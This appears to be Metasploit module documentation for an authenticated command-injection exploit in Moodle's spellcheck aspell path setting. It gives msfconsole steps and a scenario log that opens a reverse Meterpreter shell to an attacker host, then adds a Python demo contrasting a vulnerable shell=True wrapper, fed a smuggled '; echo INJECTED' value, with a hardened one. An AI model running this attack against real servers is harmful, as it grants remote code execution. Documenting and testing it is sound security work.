## Vulnerable Application

Moodle allows an authenticated administrator to define spellcheck settings via the web interface. An administrator can update the aspell path to include a command injection, which is executed on the server when the spellchecker is invoked. This is extremely similar to CVE-2013-3630, just using a different variable. Because the injection point is an administrative setting, the module logs in as the administrator, rewrites the setting, switches the spell engine to PSpellShell, triggers the spellcheck to run the payload, and then logs in again to remove the injected command from the settings.

This module was tested against Moodle version 3.10.0. Note that the module's automatic check only confirms that a Moodle instance is present; it cannot determine the version, so it reports the service as running but not validated and proceeds anyway.

### Install

Moodle provides a step-by-step guide to install their software [here](https://docs.moodle.org/311/en/Step-by-step_Installation_Guide_for_Ubuntu).

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploits/multi/http/moodle_spellcheck_cmd_exec`
1. Do: `set rhosts [ip]`
1. Do: `set targeturi [path to the Moodle install]`
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `run`
1. You should get a shell.

## Options

### Password

Password of an administrator.

### Username

Username of an administrator. Defaults to `admin`.

## Scenarios

### Moodle 3.10.0 on Ubuntu 20.04

```
resource (moodle_spellcheck.rb)> use exploits/multi/http/moodle_spellcheck_cmd_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (moodle_spellcheck.rb)> set username admin
username => admin
resource (moodle_spellcheck.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_spellcheck.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set lhost eth0
lhost => eth0
resource (moodle_spellcheck.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Moodle instance found, version unknown
[*] Authenticating as user: admin with login token Em5QrqGXT96iLHXKaTDoIwArMueav9Hq
[*] Updating aspell path
[*] Changing spell engine to PSpellShell
[*] Triggering payload
[*] Sending stage (39282 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56014) at 2021-08-27 17:49:36 -0400
[*] Sleeping 5 seconds before cleanup
[*] Authenticating as user: admin with login token mPj0QEp8KtPDgm8K9PNUauMu7wdwnSFY
[*] Removing RCE from settings
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > exit
```
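The bug class behind this module is a configured "path to a binary" being spliced into a shell command line, so that a setting value such as `/usr/bin/aspell; <command>` runs the extra command as the web server user. The following is an added example, not Moodle's code and not the Metasploit module's: it shows a minimal vulnerable wrapper beside a hardened one. The function names, the use of `/bin/echo` as a stand-in for the aspell binary, and the `; echo INJECTED` setting value are all constructed for the demonstration; Moodle's real spellchecker is PHP, so the hardening shown here (validate the setting as an existing executable path, then exec it as an argv list with no shell) is the pattern, not a patch.

```python
import os
import shutil
import subprocess

# Constructed stand-ins (not Moodle values): /bin/echo plays the role of the
# aspell binary so the demo runs on any POSIX host without aspell installed.
SAFE_PATH = shutil.which("echo") or "/bin/echo"
# What an administrator could type into an "aspell path" setting: a real
# path followed by a shell separator and an extra command.
INJECTED_PATH = SAFE_PATH + "; echo INJECTED"


def spellcheck_vulnerable(aspell_path: str, text: str) -> str:
    """The bug class: the configured path is spliced into a shell command
    line, so shell metacharacters in the setting become extra commands."""
    cmd = f"{aspell_path} -a"  # e.g. "/usr/bin/aspell -a" on a real install
    proc = subprocess.run(cmd, shell=True, input=text,
                          capture_output=True, text=True)
    return proc.stdout


def spellcheck_hardened(aspell_path: str, text: str) -> str:
    """Same feature without the injection: validate the setting as an
    absolute, existing, executable path, then exec it as argv (no shell),
    so the whole setting string is argv[0] and nothing else."""
    if (not os.path.isabs(aspell_path)
            or not os.path.isfile(aspell_path)
            or not os.access(aspell_path, os.X_OK)):
        raise ValueError(f"refusing aspell path: {aspell_path!r}")
    proc = subprocess.run([aspell_path, "-a"], input=text,
                          capture_output=True, text=True)
    return proc.stdout


def injection_fires(aspell_path: str) -> bool:
    """True if the injected marker command ran under the vulnerable wrapper."""
    return "INJECTED" in spellcheck_vulnerable(aspell_path, "helo")


def hardened_rejects(aspell_path: str) -> bool:
    """True if the hardened wrapper refuses the setting before running it."""
    try:
        spellcheck_hardened(aspell_path, "helo")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable, injected path fires ->", injection_fires(INJECTED_PATH))   # True
    print("hardened, injected path rejected ->", hardened_rejects(INJECTED_PATH))  # True
    print("hardened, clean path output ->", spellcheck_hardened(SAFE_PATH, "helo").strip())  # -a
```

The check in `spellcheck_hardened` is deliberately a path check rather than a metacharacter denylist: the setting is supposed to name one executable, so anything that is not an existing executable file is rejected outright, and passing it as an argv element means even a path containing `;` or `$(...)` could never reach a shell. Note also that the module's own cleanup step (restoring the setting after the session opens) only removes the injected value; it does not change the fact that anyone holding administrator credentials can reintroduce it.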